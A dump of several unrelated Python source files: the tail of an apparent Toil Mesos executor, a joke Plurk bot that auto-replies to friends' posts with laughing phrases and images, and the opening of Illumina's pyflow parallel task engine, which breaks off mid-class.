This is where task.data is first invoked. Using this position to setup cleanupInfo if self.workerCleanupInfo is not None: assert self.workerCleanupInfo == taskData.workerCleanupInfo else: self.workerCleanupInfo = taskData.workerCleanupInfo startTime = time() try: popen = runJob(taskData) self.runningTasks[task.task_id.value] = (popen.pid, taskData.jobStoreID) try: exitStatus = popen.wait() wallTime = time() - startTime if 0 == exitStatus: sendUpdate(mesos_pb2.TASK_FINISHED, wallTime) elif -9 == exitStatus: sendUpdate(mesos_pb2.TASK_KILLED, wallTime) else: sendUpdate(mesos_pb2.TASK_FAILED, wallTime, message=str(exitStatus)) finally: del self.runningTasks[task.task_id.value] except: wallTime = time() - startTime exc_info = sys.exc_info() log.error('Exception while running task:', exc_info=exc_info) exc_type, exc_value, exc_trace = exc_info sendUpdate(mesos_pb2.TASK_FAILED, wallTime, message=''.join(traceback.format_exception_only(exc_type, exc_value))) def runJob(job): """ :type job: toil.batchSystems.mesos.ToilJob :rtype: subprocess.Popen """ if job.userScript: job.userScript.register() log.debug("Invoking command: '%s'", job.command) with self.popenLock: return subprocess.Popen(job.command, preexec_fn=lambda: os.setpgrp(), shell=True, env=dict(os.environ, **job.environment)) def sendUpdate(taskState, wallTime=None, message=''): log.debug('Sending task status update ...') status = mesos_pb2.TaskStatus() status.task_id.value = task.task_id.value status.message = message status.state = taskState if wallTime is not None: status.data = pack('d', wallTime) driver.sendStatusUpdate(status) log.debug('... done sending task status update.') thread = threading.Thread(target=runTask) thread.start() def frameworkMessage(self, driver, message): """ Invoked when a framework message has arrived for this executor. """ log.debug("Received message from framework: {}".format(message)) def main(executorClass=MesosExecutor): logging.basicConfig(level=logging.DEBUG) log.debug("Starting executor") executor = executorClass() driver = mesos.native.MesosExecutorDriver(executor) exit_value = 0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1 assert len(executor.runningTasks) == 0 sys.exit(exit_value)
main.py
#!/usr/bin/env pipenv run python """ Nonsense plurk bot Distributed under terms of the WTFPL license. """ from poaurk import PlurkAPI from multiprocessing import Process, Value import typing import requests import json import re import loguru import datetime import time import random import schedule import sqlite3 class Bot: def __init__(self, token_file, database): self.main_flag = True self.offset = 0 self.database = database self.plurk = PlurkAPI.fromfile(token_file) status, user_channel = self.plurk.callAPI("/APP/Realtime/getUserChannel") if status: self.comet_server_url = user_channel["comet_server"] self.comet_server_url = self.comet_server_url.split('?')[0].split('#')[0] self.channel_name = user_channel["channel_name"] self.offset = 0 loguru.logger.info(f"Start pulling from comet server: {self.comet_server_url}, channel: {self.channel_name}") else: loguru.logger.error("Get comet channel failed") return con = sqlite3.connect(self.database) cur = con.cursor() cur.execute(''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='users' ''') #if the count is 1, then table exists if cur.fetchone()[0]==1: loguru.logger.info("Table exists.") else: #create table cur.execute('''CREATE TABLE IF NOT EXISTS users (id real)''') loguru.logger.info("Table not exists, create one.") con.commit() con.close() def add_user(self, id): if self.if_user(id): # If already in return False con = sqlite3.connect(self.database) cur = con.cursor() insert_with_param = """INSERT INTO users (id) VALUES (?);""" data_tuple = (id, ) cur.execute(insert_with_param, data_tuple) con.commit() con.close() return True def remove_user(self, id): if not self.if_user(id): # If not in return False con = sqlite3.connect(self.database) cur = con.cursor() cur.execute("DELETE FROM users WHERE id=?;", (id,)) con.commit() con.close() return True def if_user(self, id): result = False con = sqlite3.connect(self.database) cur = con.cursor() cur.execute("SELECT count(id) FROM users WHERE id=?;", (id,)) if cur.fetchone()[0] >= 1: result = True con.close() return result def is_friend(self, id): opt = { 'user_id': id } status, resp = self.plurk.callAPI("/APP/Profile/getPublicProfile", options=opt) if not status: loguru.logger.error(resp) return None return resp["are_friends"] def base36encode(self, number, alphabet='0123456789abcdefghijklmnopqrstuvwxyz'): """Converts an integer to a base36 string.""" if not isinstance(number, int): raise TypeError('number must be an integer') base36 = '' sign = '' if number < 0: sign = '-' number = -number if 0 <= number < len(alphabet): return sign + alphabet[number] while number != 0: number, i = divmod(number, len(alphabet)) base36 = alphabet[i] + base36 return sign + base36 def gen_msg(self): wara_imgs = [ "https://i.imgur.com/3G7rJ06.jpg", "https://i.imgur.com/641fRAZ.jpg", "https://images.plurk.com/4Wr1If26wnRKEZIllQVIzO.jpg", "https://images.plurk.com/2OkhSDoYeOsQGdvb5KM9Pn.jpg", "https://images.plurk.com/3czlRTuYeTYqCj5vicDQBq.png", "https://images.plurk.com/1M3oSnXNOMVxnOose7Wh8v.jpg", "https://images.plurk.com/1NiFD84tWntjhd65rqpofb.png", "https://images.plurk.com/3A9xyxub8URuxPUkv83Dnr.jpg", "https://images.plurk.com/5d1XD5HZ2AwNzrOtnpQt55.jpg", "https://images.plurk.com/tvs6tIDqFOlXQz8ctqyVO.png", "https://images.plurk.com/sWJm5E69kECFZXaOuOil5.jpg", "https://images.plurk.com/2dyrBaeTXMPaFHZIGM38nc.jpg", "https://images.plurk.com/2r7SHhlXE6wevIRTkAShDB.jpg", "https://images.plurk.com/37E5uFu1po0gijbDhMXNns.jpg", "https://images.plurk.com/2Xe3MqVire3OBI86q9NiTm.jpg", "https://images.plurk.com/4OdjjlnhEf0Q6Sl16b0Qpe.jpg", "https://images.plurk.com/2DsYS1rTQQpEnHYuIGRrlM.jpg", "https://images.plurk.com/63h9OSIKfXU0xMdqUcYbug.gif", "https://images.plurk.com/5K7Cfwcvf1KLbuDiNLowfX.gif", "https://images.plurk.com/4I499E93XC217BKyyrbfxs.jpg", "https://images.plurk.com/45aC4lP3VHMtxbJcmCvn7p.gif", "https://images.plurk.com/3D6GtdgKVtdXI85rkpv2gF.jpg", "https://images.plurk.com/1boeK01koxCaHKp61bNZE7.jpg", "https://images.plurk.com/6fyOZT8o4XRFjRsUYhdDPx.jpg", "https://images.plurk.com/7bHAJhlYJLKiRtIdE5cAIg.gif", "https://images.plurk.com/7qfy5z0gIhssOS0tXPccLb.jpg", "https://images.plurk.com/4CvNeGzN8VuSWDa6fdChCA.gif", "https://images.plurk.com/6E7j8fqvN4RqGcMP0W8RD4.gif", "https://images.plurk.com/6PEEClMbQe34JVhGDrP56A.jpg", "https://images.plurk.com/59YJKOGWSSVK0txkTRm5Ns.jpg", "https://images.plurk.com/2KirBTzaFncKxmbWpksyHM.jpg", "https://images.plurk.com/K19HiFh8FfJ6ikvkGpNkt.jpg", "https://images.plurk.com/6ArFHTvOVCho1ACPV1xWUM.jpg", "https://images.plurk.com/7vQkaO6QDEsiCi2pdXYNBu.jpg", "https://images.plurk.com/4zXWw4Ox7T4Jy1pipddhwF.jpg", "https://images.plurk.com/4wE1pgyKoy6q80CAtqYKcV.jpg", "https://images.plurk.com/ViZe8EY8Fov7FTWzaD9rG.jpg", "https://images.plurk.com/yHMyyfUQmuHzdCR3XefFC.jpg", "https://images.plurk.com/46bzj1vbQOjyqtTVsvhKDj.jpg", "https://images.plurk.com/7uBif82MSdV9wlwvEKNd0M.jpg", "https://images.plurk.com/3aDEp8slhs78INml84qYmR.gif", "https://images.plurk.com/2pHGirk3j8vHCTsfJPvjsE.gif", "https://images.plurk.com/47LY6qQBbGjTrQDs1fnWvo.jpg", "https://images.plurk.com/5VDnGFc25D5WubtOuuGQLs.gif", "https://images.plurk.com/1I9bt5RNjdtf8eKuskSdco.gif", "https://images.plurk.com/5p0orzgQw0eZBSrrnfVvk8.jpg", "https://images.plurk.com/1LBwMqxj15mNDrInv9x09f.jpg", "https://images.plurk.com/44ift3DX1eKGITeU1gxzKo.jpg", "https://images.plurk.com/1WjLQvgqaEhEptA3GOLtxe.png", "https://images.plurk.com/4NI5j9G032Ej94pKz2DVdr.gif", "https://images.plurk.com/1fMhrVMAcEheOe8aKYUPMG.jpg", "https://images.plurk.com/6i9p8fq1IOPaASKwFlLBEw.jpg", "https://images.plurk.com/N9ny55giShpK052P7TU8U.jpg", "https://images.plurk.com/1SR9y2XF4N5BJv19sBsh4c.jpg", "https://images.plurk.com/274nBeksho0DwJO7Py1dAX.png", "https://images.plurk.com/qlzv3DXyXbdc6VcA8Zhpa.gif", "https://images.plurk.com/3fIHpkJX0Wfxob2afGzldg.jpg", "https://images.plurk.com/6j82CzcV84CNDFr11nk33o.gif", "https://images.plurk.com/34UeK1zvIMXufXCcWBZIme.gif", "https://images.plurk.com/2yVZq4IqvV4mNkKUNKR3MT.jpg", "https://images.plurk.com/6huuRnQ823CP75Zh35GfiN.gif", "https://images.plurk.com/QYkMFAmkjnIO5of5xjZRk.jpg", "https://images.plurk.com/3mSpHWBu550r2rdKl0wk0c.gif", "https://images.plurk.com/5FXj7gQ3SaVhd7xbIG4sP7.gif" ] rand_num = random.randint(1, 100) if rand_num <= 3: return '草' elif rand_num <= 10: return random.choice(wara_imgs) + ' \n笑死' elif rand_num <= 20: return '哭啊' else: return '笑死' def refresh_channel(self): self.plurk.callAPI("/APP/Realtime/getUserChannel") self.offset = 0 loguru.logger.info("Refresh comet channel") def comet_main(self, watchdog): while self.main_flag: q = { 'channel': self.channel_name, 'offset': self.offset } try: resp = requests.get(self.comet_server_url, params=q, timeout=60) resp.raise_for_status() except requests.exceptions.HTTPError as errh: loguru.logger.error(f"Http Error: {errh}") continue except requests.exceptions.ConnectionError as errc: loguru.logger.error(f"Error Connecting: {errc}") continue except requests.exceptions.Timeout as errt: loguru.logger.error(f"Timeout Error: {errt}") continue except requests.exceptions.RequestException as err: loguru.logger.error(f"Request Other Error: {err}") continue loguru.logger.debug(f"Request url: {resp.url}") comet_content = resp.text m = re.search(r'CometChannel.scriptCallback\((.*)\);', comet_content) try: json_content = json.loads(m.group(1)) except Exception as err: loguru.logger.error(f"Json Error: {err}") try: if "data" in json_content: self.comet_callBack(json_content["data"]) except Exception as err: loguru.logger.error(f"Callback Error: {err}") try: if "new_offset" in json_content: self.offset = json_content["new_offset"] # loguru.logger.debug(f"Update Offset: {self.offset}") if self.offset<0: loguru.logger.error(f"Offset Error: {offset}") self.refresh_channel() except Exception as err: loguru.logger.error(f"Offset Error: {err}") watchdog.value = 1 def comet_callBack(self, data): for d in data: if 'type' not in d: loguru.logger.warning(json.dumps(d)) continue if d['type'] == 'new_plurk': if not self.is_friend(d["user_id"]): # Not friend, jump continue if "不好笑" in d["content"]: res = self.add_user(d["user_id"]) if res: loguru.logger.info("Stop user " + str(d["user_id"])) elif "好笑嗎" in d["content"]: res = self.remove_user(d["user_id"]) if res: loguru.logger.info("Reset user " + str(d["user_id"])) if self.if_user(d["user_id"]): continue else: opt = { 'plurk_id': d['plurk_id'], 'qualifier': ':', 'content': self.gen_msg() } plurk_id_base36 = self.base36encode(opt['plurk_id']) loguru.logger.info(f"Response to https://www.plurk.com/p/{plurk_id_base36}") self.plurk.callAPI("/APP/Responses/responseAdd", options=opt) def routine_main(self, watchdog): def add_all_friends(): self.plurk.callAPI("/APP/Alerts/addAllAsFriends") def knock_comet(): knock_comet_url = "https://www.plurk.com/_comet/generic" p = { 'channel': self.channel_name } try: resp = requests.get(knock_comet_url, params=p, timeout=60) resp.raise_for_status() except requests.exceptions.HTTPError as errh: loguru.logger.error(f"Http Error: {errh}") return except requests.exceptions.ConnectionError as errc: loguru.logger.error(f"Error Connecting: {errc}") return except requests.exceptions.Timeout as errt: loguru.logger.error(f"Timeout Error: {errt}") return except requests.exceptions.RequestException as err: loguru.logger.error(f"Request Other Error: {err}") return except Exception as err: loguru.logger.error(f"Other Error: {err}") return loguru.logger.debug(f"Request url: {resp.url}") def watch_dog(): if not watchdog.value: loguru.logger.error("No response") return loguru.logger.debug("Running...") watchdog.value = 0 schedule.every(5).seconds.do(add_all_friends) schedule.every(1).minutes.do(knock_comet) schedule.every(10).minutes.do(watch_dog) while self.main_flag: try: schedule.run_pending() except Exception as err: loguru.logger.error(f"Schedule Task Error: {err}") time.sleep(1) def main(self): watchdog_flag = Value('i', 1) try: comet_proc = Process(target=self.comet_main, args=(watchdog_flag,), daemon=True) routine_proc = Process(target=self.routine_main, args=(watchdog_flag,), daemon=True) comet_proc.start() routine_proc.start() while True: time.sleep(100) loguru.logger.debug(f"Running... Comet: {comet_proc.is_alive()}, Routine: {routine_proc.is_alive()}") except (KeyboardInterrupt, SystemExit): comet_proc.terminate() routine_proc.terminate() loguru.logger.info("Stop bot.") if __name__=="__main__": loguru.logger.add( # f'data/{datetime.date.today():%Y%m%d}.log', 'data/{time}.log', rotation='1 day', retention='7 days', enqueue=True, # level='INFO') level='DEBUG') bot = Bot("token.txt", "data/users.db") bot.main()
pyflow.py
#!/usr/bin/env python # # pyFlow - a lightweight parallel task engine # # Copyright (c) 2012-2017 Illumina, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY # WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # """ pyflow -- a lightweight parallel task engine """ __author__ = 'Christopher Saunders' import copy import datetime import os import re import shutil import subprocess import sys import threading import time import traceback from pyflow.pyflowConfig import siteConfig moduleDir = os.path.abspath(os.path.dirname(__file__)) # minimum python version # pyver = sys.version_info if pyver[0] != 3 or (pyver[0] == 3 and pyver[1] < 6) : raise Exception("pyflow module has only been tested for python versions [3.7, 3.6]") # In python 2.5 or greater, we can lower the per-thread stack size to # improve memory consumption when a very large number of jobs are # run. Below it is lowered to 256Kb (compare to linux default of # 8Mb). # threading.stack_size(min(256 * 1024, threading.stack_size())) class GlobalSync : """ Control total memory usage in non-local run modes by limiting the number of simultaneous subprocess calls Note that in practice this only controls the total number of qsub/qstat calls in SGE mode """ maxSubprocess = 2 subprocessControl = threading.Semaphore(maxSubprocess) def getPythonVersion() : python_version = sys.version_info return ".".join([str(i) for i in python_version]) pythonVersion = getPythonVersion() # Get pyflow version number # def getPyflowVersion() : # this will be automatically macro-ed in for pyflow releases: pyflowAutoVersion = None # Get version number in regular release code: if pyflowAutoVersion is not None : return pyflowAutoVersion # Get version number during dev: try : proc = subprocess.Popen(["git", "describe"], stdout=subprocess.PIPE, stderr=open(os.devnull, "w"), cwd=moduleDir, shell=False) (stdout, _stderr) = proc.communicate() stdout = stdout.decode('utf-8') retval = proc.wait() stdoutList = stdout.split("\n")[:-1] if (retval == 0) and (len(stdoutList) == 1) : return stdoutList[0] except OSError: # no git installed pass return "unknown" __version__ = getPyflowVersion() # portability functions: # def _isWindows() : import platform return (platform.system().find("Windows") > -1) class GlobalConstants : isWindows=_isWindows() def isWindows() : return GlobalConstants.isWindows def forceRename(src,dst) : """ dst is only overwritten in a single atomic operation on *nix on windows, we can't have atomic rename, but we can recreate the behavior otherwise """ if isWindows() : if os.path.exists(dst) : os.remove(dst) maxTrials=5 for trial in range(maxTrials) : try : os.rename(src,dst) return except OSError : if (trial+1) >= maxTrials : raise time.sleep(5) def cleanEnv() : """ clear bash functions out of the env without this change the shellshock security update causes pyflow SGE jobs to fail with the behavior of current (201512) versions of SGE qsub """ ekeys = list(os.environ.keys()) for key in ekeys : if key.endswith("()") : del os.environ[key] # utility values and functions: # def ensureDir(d): """ make directory if it doesn't already exist, raise exception if something else is in the way: """ if os.path.exists(d): if not os.path.isdir(d) : raise Exception("Can't create directory: %s" % (d)) else : os.makedirs(d) # # time functions -- note there's an additional copy in the pyflow wrapper script: # # all times in pyflow are utc (never local) and printed to iso8601 # def timeStampToTimeStr(ts) : """ converts time.time() output to timenow() string """ return datetime.datetime.utcfromtimestamp(ts).isoformat() def timeStrNow(): return timeStampToTimeStr(time.time()) def timeStrToTimeStamp(ts): import calendar d = datetime.datetime(*list(map(int, re.split(r'[^\d]', ts)[:-1]))) return calendar.timegm(d.timetuple()) def isInt(x) : return isinstance(x, int) def isString(x): return isinstance(x, str) def isIterable(x): return (getattr(x, '__iter__', False) != False) def lister(x): """ Convert input into a list, whether it's already iterable or not. Make an exception for individual strings to be returned as a list of one string, instead of being chopped into letters Also, convert None type to empty list: """ # special handling in case a single string is given: if x is None : return [] if (isString(x) or (not isIterable(x))) : return [x] return list(x) def setzer(x) : """ convert user input into a set, handling the pathological case that you have been handed a single string, and you don't want a set of letters: """ return set(lister(x)) class LogState : """ A simple logging enum """ INFO = 1 WARNING = 2 ERROR = 3 @classmethod def toString(cls,logState) : if logState == cls.INFO : return "INFO" if logState == cls.WARNING : return "WARNING" if logState == cls.ERROR : return "ERROR" raise Exception("Unknown log state: " + str(logState)) # allow fsync to be globally turned off class LogGlobals : isFsync = True def hardFlush(ofp): ofp.flush() if ofp.isatty() : return # fsync call has been reported to consistently fail in some contexts (rsh?) # so allow OSError if not LogGlobals.isFsync : return try : os.fsync(ofp.fileno()) except OSError: LogGlobals.isFsync = False def log(ofpList, msgList, linePrefix=None): """ General logging function. @param ofpList: A container of file objects to write to @param msgList: A container of (or a single) multi-line log message string. Final newlines are not required @param linePrefix: A prefix to add before every line. This will come *after* the log function's own '[time] [hostname]' prefix. @return: Returns a boolean tuple of size ofpList indicating the success of writing to each file object """ msgList = lister(msgList) ofpList = setzer(ofpList) retval = [True] * len(ofpList) for msg in msgList : # strip final trailing newline if it exists: if (len(msg) > 0) and (msg[-1] == "\n") : msg = msg[:-1] linePrefixOut = "[%s] [%s]" % (timeStrNow(), siteConfig.getHostName()) if linePrefix is not None : linePrefixOut += " " + linePrefix # split message into prefixable lines: for i, ofp in enumerate(ofpList): # skip io streams which have failed before: if not retval[i] : continue try : for line in msg.split("\n") : ofp.write("%s %s\n" % (linePrefixOut, line)) hardFlush(ofp) except IOError: retval[i] = False return retval def getThreadName(): return threading.currentThread().getName() def isMainThread() : return (getThreadName == "MainThread") class StrFileObject(object) : """ fakes a filehandle for library functions which write to a stream, and captures output in a string """ def __init__(self) : self.str = "" def write(self, string) : self.str += string def __str__(self) : return self.str def getTracebackStr() : return traceback.format_exc() def getExceptionMsg() : msg = ("Unhandled Exception in %s\n" % (getThreadName())) + getTracebackStr() if msg[-1] == "\n" : msg = msg[:-1] return msg.split("\n") def cmdline() : return " ".join(sys.argv) def msgListToMsg(msgList): """ convert string or list of strings into a single string message """ msg = "" isFirst=True for chunk in lister(msgList) : if isFirst : isFirst = False else : msg += "\n" if ((len(chunk)>0) and (chunk[-1] == '\n')) : chunk = chunk[:-1] msg += chunk return msg emailRegex = re.compile(r"(?:^|\s)[-a-z0-9_.]+@(?:[-a-z0-9]+\.)+[a-z]{2,6}(?:\s|$)", re.IGNORECASE) def verifyEmailAddy(x) : return (emailRegex.match(x) is not None) def isLocalSmtp() : """ return true if a local smtp server is available """ import smtplib try : s = smtplib.SMTP('localhost') except : return False return True def sendEmail(mailTo, mailFrom, subject, msgList) : import smtplib # this is the way to import MIMEText in py 2.4: from email.mime.text import MIMEText # format message list into a single string: msg = msgListToMsg(msgList) mailTo = setzer(mailTo) msg = MIMEText(msg) msg["Subject"] = subject msg["From"] = mailFrom msg["To"] = ", ".join(mailTo) s = smtplib.SMTP('localhost') s.sendmail(mailFrom, list(mailTo), msg.as_string()) s.quit() def boolToStr(b) : return str(int(b)) def argToBool(x) : """ convert argument of unknown type to a bool: """ class FalseStrings : val = ("", "0", "false", "f", "no", "n", "off") if isinstance(x, str) : return (x.lower() not in FalseStrings.val) return bool(x) def hashObjectValue(obj) : """ This function hashes objects values -- the hash will be the same for two objects containing the same methods and data, so it corresponds to 'A==B' and *not* 'A is B'. """ import pickle import hashlib hashlib.md5(pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)).hexdigest() namespaceSep = "+" def namespaceJoin(a, b) : """ join two strings with a separator only if a exists """ if a == "" : return b elif b == "" : return a return a + namespaceSep + b def namespaceTypeLabel(namespace) : """ Provide a consistent naming scheme to users for embedded workflows """ if namespace == "" : return "master workflow" else : return "sub-workflow" def namespaceLabel(namespace) : """ Provide a consistent naming scheme to users for embedded workflows """ if namespace == "" : return "master workflow" else : return "sub-workflow '%s'" % (namespace) class ExpWaiter(object) : """ Convenience object to setup exponentially increasing wait/polling times """ def __init__(self, startSec, factor, maxSec, event = None) : """ optionally allow an event to interrupt wait cycle """ assert (startSec > 0.) assert (factor > 1.) assert (maxSec >= startSec) self.startSec = startSec self.factor = factor self.maxSec = maxSec self.event = event self.sec = self.startSec self.isMax = False def reset(self) : self.sec = self.startSec def wait(self) : if self.event is None : time.sleep(self.sec) else : self.event.wait(self.sec) if self.isMax : return self.sec = min(self.sec * self.factor, self.maxSec) self.isMax = (self.sec == self.maxSec) assert self.sec <= self.maxSec def lockMethod(f): """ method decorator acquires/releases object's lock """ def wrapped(self, *args, **kw): if not hasattr(self,"lock") : self.lock = threading.RLock() self.lock.acquire() try: return f(self, *args, **kw) finally: self.lock.release() return wrapped class Bunch: """ generic struct with named argument constructor """ def __init__(self, **kwds): self.__dict__.update(kwds) def stackDump(dumpfp): """ adapted from haridsv @ stackoverflow: """ athreads = threading.enumerate() tnames = [(th.getName()) for th in athreads] frames = None try: frames = sys._current_frames() except AttributeError: # python version < 2.5 pass id2name = {} try: id2name = dict([(th.ident, th.getName()) for th in athreads]) except AttributeError : # python version < 2.6 pass if (frames is None) or (len(tnames) > 50) : dumpfp.write("ActiveThreadCount: %i\n" % (len(tnames))) dumpfp.write("KnownActiveThreadNames:\n") for name in tnames : dumpfp.write(" %s\n" % (name)) dumpfp.write("\n") return dumpfp.write("ActiveThreadCount: %i\n" % (len(frames))) dumpfp.write("KnownActiveThreadNames:\n") for name in tnames : dumpfp.write(" %s\n" % (name)) dumpfp.write("\n") for tid, stack in list(frames.items()): dumpfp.write("Thread: %d %s\n" % (tid, id2name.get(tid, "NAME_UNKNOWN"))) for filename, lineno, name, line in traceback.extract_stack(stack): dumpfp.write('File: "%s", line %d, in %s\n' % (filename, lineno, name)) if line is not None: dumpfp.write(" %s\n" % (line.strip())) dumpfp.write("\n") dumpfp.write("\n") ####################################################################### # # these functions are written out to a utility script which allows users # to make a dot graph from their current state directory output. We # keep it in pyflow as working code so that pyflow can call sections of it. # def taskStateHeader() : return "#taskLabel\ttaskNamespace\trunState\terrorCode\trunStateUpdateTime\n" def taskStateParser(stateFile) : class Constants : nStateCols = 5 for line in open(stateFile) : if len(line) and line[0] == "#" : continue line = line.strip() w = line.split("\t") if len(w) != Constants.nStateCols : raise Exception("Unexpected format in taskStateFile: '%s' line: '%s'" % (stateFile, line)) yield [x.strip() for x in w] def taskInfoHeader() : return "#%s\n" % ("\t".join(("taskLabel", "taskNamespace", "taskType", "nCores", "memMb", "priority", "isForceLocal", "dependencies", "cwd", "command"))) def taskInfoParser(infoFile) : class Constants : nInfoCols = 10 for line in open(infoFile) : if len(line) and line[0] == "#" : continue line = line.lstrip() w = line.split("\t", (Constants.nInfoCols - 1)) if len(w) != Constants.nInfoCols : raise Exception("Unexpected format in taskInfoFile: '%s' line: '%s'" % (infoFile, line)) yield [x.strip() for x in w] def getTaskInfoDepSet(s) : # reconstruct dependencies allowing for extraneous whitespace in the file: s = s.strip() if s == "" : return [] return set([d.strip() for d in s.split(",")]) class TaskNodeConstants(object) : validRunstates = ("complete", "running", "queued", "waiting", "error") class DotConfig(object) : """ A static container of configuration data for dot graph output """ runstateDotColor = {"waiting" : "grey", "running" : "green", "queued" : "yellow", "error" : "red", "complete" : "blue" } runstateDotStyle = {"waiting" : "dashed", "running" : None, "queued" : None, "error" : "bold", "complete" : None } @staticmethod def getRunstateDotAttrib(runstate) : color = DotConfig.runstateDotColor[runstate] style = DotConfig.runstateDotStyle[runstate] attrib = "" if color is not None : attrib += " color=%s" % (color) if style is not None : attrib += " style=%s" % (style) return attrib @staticmethod def getTypeDotAttrib(nodeType) : attrib = "" if nodeType == "workflow" : attrib += " shape=rect style=rounded" return attrib @staticmethod def getDotLegend() : string = '{ rank = source; Legend [shape=none, margin=0, label=<\n' string += '<TABLE BORDER="0" CELLBORDER="1" CELLSPACING="0" CELLPADDING="4">\n' string += '<TR><TD COLSPAN="2">Legend</TD></TR>\n' for state in TaskNodeConstants.validRunstates : color = DotConfig.runstateDotColor[state] string += '<TR> <TD>%s</TD> <TD BGCOLOR="%s"></TD> </TR>\n' % (state, color) string += '</TABLE>>];}\n' return string def writeDotGraph(taskInfoFile, taskStateFile, workflowClassName) : """ write out the current graph state in dot format """ addOrder = [] taskInfo = {} headNodes = set() tailNodes = set() # read info file: for (label, namespace, ptype, _nCores, _memMb, _priority, _isForceLocal, depStr, _cwdStr, _command) in taskInfoParser(taskInfoFile) : tid = (namespace, label) addOrder.append(tid) taskInfo[tid] = Bunch(ptype=ptype, parentLabels=getTaskInfoDepSet(depStr)) if len(taskInfo[tid].parentLabels) == 0 : headNodes.add(tid) tailNodes.add(tid) for plabel in taskInfo[tid].parentLabels : ptid = (namespace, plabel) if ptid in tailNodes : tailNodes.remove(ptid) for (label, namespace, runState, _errorCode, _time) in taskStateParser(taskStateFile) : tid = (namespace, label) taskInfo[tid].runState = runState dotFp = sys.stdout dotFp.write("// Task graph from pyflow object '%s'\n" % (workflowClassName)) dotFp.write("// Process command: '%s'\n" % (cmdline())) dotFp.write("// Process working dir: '%s'\n" % (os.getcwd())) dotFp.write("// Graph capture time: %s\n" % (timeStrNow())) dotFp.write("\n") dotFp.write("digraph %s {\n" % (workflowClassName + "Graph")) dotFp.write("\tcompound=true;\nrankdir=LR;\nnode[fontsize=10];\n") labelToSym = {} namespaceGraph = {} for (i, (namespace, label)) in enumerate(addOrder) : tid = (namespace, label) if namespace not in namespaceGraph : namespaceGraph[namespace] = "" sym = "n%i" % i labelToSym[tid] = sym attrib1 = DotConfig.getRunstateDotAttrib(taskInfo[tid].runState) attrib2 = DotConfig.getTypeDotAttrib(taskInfo[tid].ptype) namespaceGraph[namespace] += "\t\t%s [label=\"%s\"%s%s];\n" % (sym, label, attrib1, attrib2) for (namespace, label) in addOrder : tid = (namespace, label) sym = labelToSym[tid] for plabel in taskInfo[tid].parentLabels : ptid = (namespace, plabel) namespaceGraph[namespace] += ("\t\t%s -> %s;\n" % (labelToSym[ptid], sym)) for (i, ns) in enumerate(namespaceGraph.keys()) : isNs = ((ns is not None) and (ns != "")) dotFp.write("\tsubgraph cluster_sg%i {\n" % (i)) if isNs : dotFp.write("\t\tlabel = \"%s\";\n" % (ns)) else : dotFp.write("\t\tlabel = \"%s\";\n" % (workflowClassName)) dotFp.write(namespaceGraph[ns]) dotFp.write("\t\tbegin%i [label=\"begin\" shape=diamond];\n" % (i)) dotFp.write("\t\tend%i [label=\"end\" shape=diamond];\n" % (i)) for (namespace, label) in headNodes : if namespace != ns : continue sym = labelToSym[(namespace, label)] dotFp.write("\t\tbegin%i -> %s;\n" % (i, sym)) for (namespace, label) in tailNodes : if namespace != ns : continue sym = labelToSym[(namespace, label)] dotFp.write("\t\t%s -> end%i;\n" % (sym, i)) dotFp.write("\t}\n") if ns in labelToSym : dotFp.write("\t%s -> begin%i [style=dotted];\n" % (labelToSym[ns], i)) # in LR orientation this will make the graph look messy: # dotFp.write("\tend%i -> %s [style=invis];\n" % (i,labelToSym[ns])) dotFp.write(DotConfig.getDotLegend()) dotFp.write("}\n") hardFlush(dotFp) def writeDotScript(taskDotScriptFile, taskInfoFileName, taskStateFileName, workflowClassName) : """ write dot task graph creation script """ import inspect dsfp = os.fdopen(os.open(taskDotScriptFile, os.O_WRONLY | os.O_CREAT, 0o755), 'w') dsfp.write("""#!/usr/bin/env python # # This is a script to create a dot graph from pyflow state files. # Usage: $script >| task_graph.dot # # Note that script assumes the default pyflow state files are in the script directory. # # This file was autogenerated by process: '%s' # ...from working directory: '%s' # import datetime,os,sys,time scriptDir=os.path.abspath(os.path.dirname(__file__)) """ % (os.getcwd(), cmdline())) for dobj in (timeStampToTimeStr, timeStrNow, cmdline, Bunch, LogGlobals, hardFlush, TaskNodeConstants, DotConfig, taskStateParser, taskInfoParser, getTaskInfoDepSet, writeDotGraph) : dsfp.write("\n\n") dsfp.write(inspect.getsource(dobj)) dsfp.write(""" if __name__ == '__main__' : writeDotGraph(os.path.join(scriptDir,'%s'),os.path.join(scriptDir,'%s'),'%s') """ % (taskInfoFileName, taskStateFileName, workflowClassName)) ################################################################ # # workflowRunner Helper Classes: # # class Command(object) : """ Commands can be presented as strings or argument lists (or none) """ def __init__(self, cmd, cwd, env=None) : # 1: sanitize/error-check cmd if ((cmd is None) or (cmd == "") or (isIterable(cmd) and len(cmd) == 0)) : self.cmd = None self.type = "none" elif isString(cmd) : self.cmd = Command.cleanStr(cmd) self.type = "str" elif isIterable(cmd) : self.cmd = [] for i, s in enumerate(cmd): if not (isString(s) or isInt(s)): raise Exception("Argument: '%s' from position %i in argument list command is not a string or integer. Full command: '%s'" % (str(s), (i + 1), " ".join([str(s) for s in cmd]))) self.cmd.append(Command.cleanStr(s)) self.type = "list" else : raise 